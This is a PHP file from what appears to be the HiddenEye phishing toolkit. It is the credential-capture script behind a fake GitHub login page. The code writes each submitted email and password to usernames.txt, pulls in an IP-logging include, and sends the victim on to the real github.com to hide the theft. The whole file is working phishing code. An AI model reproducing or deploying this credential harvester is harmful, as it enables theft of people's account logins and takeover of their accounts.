HiddenEye-Legacy/WebPages/GitHub/login.php
Usama Abdul Sattar e9cb8683df
Update login.php
2018-06-07 14:16:53 +05:00

8 lines
211 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://github.com');
exit();